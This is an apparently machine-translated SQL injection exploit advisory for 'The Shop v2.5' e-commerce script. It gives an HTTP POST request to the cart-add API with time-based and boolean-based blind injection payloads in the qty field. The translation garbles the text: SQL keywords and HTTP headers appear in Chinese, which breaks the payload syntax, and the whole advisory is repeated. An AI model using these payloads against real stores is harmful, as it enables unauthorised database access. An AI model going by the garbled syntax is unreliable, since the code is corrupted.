#利用标题:商店v2.5 -SQL注入
#日期: 2023-06-17
#利用作者: ahmetümitBayram
#vendor: https://codecanyon.net/item/the-shop/34858541
#demo site: https://shop.activeitzone.com
#在: Kali Linux上测试
#CVE: N/A。
### 要求###
POST/API/V1/CARTS/添加HTTP/1.1
content-type:应用程序/json
Accept:应用程序/JSON,文本/平原, /
X-重新要求- WITH: XMLHTTPREQUEST
X-XSRF-TOKEN3360 XJWXIPUDENXAHWGFDA1NUZBX1R155JZFHD5AB8L4
Referer: https://localhost
cookie: xsrf-token=lbhb7u7sgrn4hb3db3nsgobmle2tgdiywiteejgl;
the_shop_session=igqjnenlvrfgyzvsvsvowwowwumdj8nrl2xzprxht93h7
内容长度: 81
Accept-incoding: Gzip,Deflate,br
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36
(Khtml,像壁虎一样)Chrome/109.0.0.0 Safari/537.36
HOST: LOCALHOST
Connection:保持空白
{'variation_id':'119','qty':'if(now()=sysdate(),sleep(6),0),','temp_user_id':null}
###参数有效载荷###
参数: JSON QTY((自定义)帖子)
Type:基于布尔的盲人
title:基于布尔的盲人- 参数替换(原始值)
payload: {'variation_id':'119','qty':'(select(case when(4420=4420)
然后'if(现在()=sysdate(),睡眠(6),0)'else(选择3816联合选择4495)
end))','temp_user_id':null}
Type:基于时间的盲人
title: MySQL 5.0.12或基于时间的盲人(重查询)
payload: {'variation_id':'119','qty':'if(now()=sysdate(),sleep(6),0)或
2614=(从信息_schema.columns a中选择计数(*),
信息_SCHEMA.COLUMNS B,Information_Schema.Columns
c)','temp_user_id':null}
#日期: 2023-06-17
#利用作者: ahmetümitBayram
#vendor: https://codecanyon.net/item/the-shop/34858541
#demo site: https://shop.activeitzone.com
#在: Kali Linux上测试
#CVE: N/A。
### 要求###
POST/API/V1/CARTS/添加HTTP/1.1
content-type:应用程序/json
Accept:应用程序/JSON,文本/平原, /
X-重新要求- WITH: XMLHTTPREQUEST
X-XSRF-TOKEN3360 XJWXIPUDENXAHWGFDA1NUZBX1R155JZFHD5AB8L4
Referer: https://localhost
cookie: xsrf-token=lbhb7u7sgrn4hb3db3nsgobmle2tgdiywiteejgl;
the_shop_session=igqjnenlvrfgyzvsvsvowwowwumdj8nrl2xzprxht93h7
内容长度: 81
Accept-incoding: Gzip,Deflate,br
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36
(Khtml,像壁虎一样)Chrome/109.0.0.0 Safari/537.36
HOST: LOCALHOST
Connection:保持空白
{'variation_id':'119','qty':'if(now()=sysdate(),sleep(6),0),','temp_user_id':null}
###参数有效载荷###
参数: JSON QTY((自定义)帖子)
Type:基于布尔的盲人
title:基于布尔的盲人- 参数替换(原始值)
payload: {'variation_id':'119','qty':'(select(case when(4420=4420)
然后'if(现在()=sysdate(),睡眠(6),0)'else(选择3816联合选择4495)
end))','temp_user_id':null}
Type:基于时间的盲人
title: MySQL 5.0.12或基于时间的盲人(重查询)
payload: {'variation_id':'119','qty':'if(now()=sysdate(),sleep(6),0)或
2614=(从信息_schema.columns a中选择计数(*),
信息_SCHEMA.COLUMNS B,Information_Schema.Columns
c)','temp_user_id':null}
